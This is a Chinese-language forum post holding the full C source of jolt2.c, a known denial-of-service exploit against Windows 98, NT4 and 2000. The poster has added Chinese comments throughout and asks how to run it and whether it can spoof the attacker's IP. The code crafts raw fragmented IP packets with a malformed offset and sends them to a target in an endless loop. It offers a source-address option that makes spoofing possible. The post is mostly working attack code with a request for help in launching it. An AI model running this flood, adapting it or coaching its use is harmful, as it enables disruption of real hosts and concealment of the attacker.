下面是非常经典的jolt2 UDP FLOOD 代码,照着书给加了注释,在LINUX下可以运行,但是不知道该输入什么执行命令,求教。另外这个程序貌似不能伪造攻击者IP?求问 OvO ...
/* Jolt2.c - Tested against Win98, WinNT4/sp5,6, Win2K.
An interesting side note is that minor changes to this packet cause
NT4/Win2k (maybe others, not tested) memory use to jump
substantially (+70 meg non-paged-pool on a machine with 196 mb
phys). There seems to be a hard upper limit, but on machines with smaller
amounts of memory or smaller swapfiles, ramping up the non-paged-pool this
much might lead to a BSOD.
.phonix.
*/
/*
- File: jolt2.c
- Author: Phonix phonix@moocow.org
- Date: 23-May-00 *
- Description: This is the proof-of-concept code for the
- Windows denial-of-serice attack described by
- the Razor team (NTBugtraq, 19-May-00)
- (MS00-029). This code causes cpu utilization
- to go to 100%. *
- Tested against: Win98; NT4/SP5,6; Win2K *
- Written for: My Linux box. YMMV. Deal with it. *
- Thanks: This is standard code. Ripped from lots of places.
- Insert your name here if you think you wrote some of
- it. It's a trivial exploit, so I won't take credit
- for anything except putting this file together. */ #include #include #include #include #include #include #include #include #include #include #include
//定义数据包结构
struct _pkt
{
struct iphdr ip;
union {
struct icmphdr icmp;
struct udphdr udp;
} proto;
char data;
} pkt;
//获取各种数据包长度
int icmplen = sizeof(struct icmphdr),
udplen = sizeof(struct udphdr),
iplen = sizeof(struct iphdr),
spf_sck;
//程序的正确用法提示
void usage(char *pname)
{
fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n",
pname);
fprintf (stderr, "Note: UDP used if a port is specified, otherwise ICMP\n");
exit(0);
}
//主机名到IP地址的转换
u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;
res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}
//出错退出处理
void quit(char *reason)
{
perror(reason);
close(spf_sck);
exit(-1);
}
//组装碎片数据包并发送
int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
{
int bs, psize;
unsigned long x;
struct sockaddr_in to;
//填写地址信息
to.sin_family = AF_INET;
to.sin_port = 1235;
to.sin_addr.s_addr = dst_addr;
if (port)
psize = iplen + udplen + 1;
else
psize = iplen + icmplen + 1; //包长为29,因为只有一个字节的载荷数据
memset(&pkt, 0, psize); //给存放数据包内容的缓冲区清零
//填写数据包
pkt.ip.version = 4; //版本号
pkt.ip.ihl = 5; //包头长度为5个32bit,即20字节
pkt.ip.tot_len = htons(iplen + icmplen) + 40;
pkt.ip.id = htons(0x455); //IP包的ID为1109=0x455,可以作为IDS检验的一个特征,只是这个值很容易改变
pkt.ip.ttl = 255;
pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);//如果指定了端口,则协议时ICMP,否则是UDP
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons (8190);//偏移8190,即0x1FFE
if (port) //如果有端口参数,则构造UDP数据包
{
pkt.proto.udp.source = htons(port|1235); //指定源端口为目的端口与1235的或运算结果
pkt.proto.udp.dest = htons(port);
pkt.proto.udp.len = htons(9);
pkt.data = 'a'; //UDP数据包中的载荷数据只有一个字节,即a,体现低数据率
} else { //若没有指定端口,则构造ICMP数据包
pkt.proto.icmp.type = ICMP_ECHO;
pkt.proto.icmp.code = 0;
pkt.proto.icmp.checksum = 0; //校验和为0
}
//循环发送,死循环
while (1) {
bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr)); //在循环中不停地发送伪造数据包
}
return bs;
}
//主程序
int main(int argc, char *argv[])
{
u_long src_addr, dst_addr;
int i, bs=1, port=0;
char hostname[32];
if (argc < 2) //如果提供的参数数目不足,提示使用方法
usage (argv[0]);
gethostname (hostname, 32); //获取本机地址
src_addr = host_to_ip(hostname); //将本机地址赋给原地址变量src_addr
//解析参数
while ((i = getopt (argc, argv, "s:p:h")) != EOF)
{
switch (i)
{
case 's': //原地址,由于使用方法中原地址不是必需的,因此这里检测是否提供了原地址,若提供了,则赋给src_addr
src_addr = host_to_ip(optarg);
if (!src_addr)
quit("Bad source address given."); //提示原地址错误,退出
break;
case 'p': //端口号
port = atoi(optarg);
if ((port <=0) || (port > 65535))
quit ("Invalid port number given."); //提示端口错误,退出
break;
case 'h': //如果参数是h(help),则提示用法
default:
usage (argv[0]);
}
}
//主机IP地址转换,提取目标地址
dst_addr = host_to_ip(argv[argc-1]);
if (!dst_addr)
quit("Bad destination address given.");
//创建socket
spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
quit("socket()");
//设置socket
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
sizeof(bs)) < 0) //指定IP包头的信息由程序员自己填写
quit("IP_HDRINCL");
//实施碎片攻击
do_frags (spf_sck, src_addr, dst_addr, port);//发送分片数据包
}
